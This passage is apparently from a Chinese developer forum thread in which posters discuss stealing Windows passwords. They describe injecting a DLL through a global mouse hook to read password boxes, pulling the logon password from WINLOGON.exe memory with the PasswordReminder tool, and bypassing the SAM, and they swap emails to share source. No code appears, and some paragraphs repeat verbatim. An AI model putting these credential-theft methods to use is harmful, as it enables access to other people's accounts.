在调用这个函数的地方和要取的密码框在一个进程里,那么是可以成功的。
进入目标进程后再调用这个函数。
用全局鼠标钩子。用鼠标钩子能取密码的地方肯定是可见的窗口,所以肯定能接收鼠标消息,这样,只要鼠标从它上面一过,我的DLL就进入了目标进程。然后,在在鼠标钩子的钩子函数中,可以很方便的得到鼠标位置,而且这个钩子函数是在DLL里,这时也已经进入了目标进程,所以这时调用SendMessage是可以取出密码的。
进入目标进程后再调用这个函数。
用全局鼠标钩子。用鼠标钩子能取密码的地方肯定是可见的窗口,所以肯定能接收鼠标消息,这样,只要鼠标从它上面一过,我的DLL就进入了目标进程。然后,在在鼠标钩子的钩子函数中,可以很方便的得到鼠标位置,而且这个钩子函数是在DLL里,这时也已经进入了目标进程,所以这时调用SendMessage是可以取出密码的。
#14
我觉得做出来后就可以打电话给比尔了!
#15
侮辱比尔的重任就交给兄弟们了!哈哈哈哈
#16
PasswordReminder可以显示当前登录用户的密码。
我编译过,测试通过,可以得到密码的。
我编译过,测试通过,可以得到密码的。
#17
可以得到密码。我只有exe文件没有源代码,我不知道那个程序怎么编的》
#18
PasswordReminder:
WINLOGON.exe肯定把我们登陆的用户名和密码加密后 放在他的进程空间的某一个地方。
PasswordReminder是通过调用一些未文档化的Native api实现的
WINLOGON.exe肯定把我们登陆的用户名和密码加密后 放在他的进程空间的某一个地方。
PasswordReminder是通过调用一些未文档化的Native api实现的
#19
NowCan 的网站上有
#20
SP4 的都可以的
#21
看看。
#22
PasswordReminder的确可以获得密码,就是http://expert.csdn.net/Expert/topic/2038/2038889.xml?temp=.5845606帖子的内容,不过我试验了,当使用了Windows2000的Run As功能以后,就不可以获得密码,错误是在内存中没有找到密码,不知道原因,看来这个程序必须是以登录用户身份运行的程序才可以获取密码,遇到“熊猫卫士”等网络版的杀毒软件,估计就不灵了。
#23
答案是肯定的,我有取得密码的cb版本的程序,自己用上面的那个程序更改的,如果谁要可以给我发邮件,zihan06@yeah.net
#24
zihan(子寒) 可不可以给我发一份源代码?
vick@95999.net
vick@95999.net
#25
已经发出了,请接收!
#26
要破解密码很难,但瑞士的研究着却可以在12秒内解除Win2000的密码
#27
楼上的消息好像不准确吧,我(改)的那个程序可以在1秒钟之类实现哦.不过不是破解,而是取出
如果真的强行破解,应该不可能实现的,如果我的密码足够长的话
如果真的强行破解,应该不可能实现的,如果我的密码足够长的话
#28
子寒,我想要你那个源程序,多谢了!
#29
To zihan(子寒):
它说的是“解除”,而不是“破解”。
也就是说让win2000失去密码保护就可以了。
也就是说只要删掉密码,或改成你指定的另一个密码就行了,
不需要得出目前具体的密码。
我也见过类似的报道,说什么设法破坏SAM就可以了。
它说的是“解除”,而不是“破解”。
也就是说让win2000失去密码保护就可以了。
也就是说只要删掉密码,或改成你指定的另一个密码就行了,
不需要得出目前具体的密码。
我也见过类似的报道,说什么设法破坏SAM就可以了。
#30
我看到程序员杂志上有一篇这样的文章
好象是第八期
好象是第八期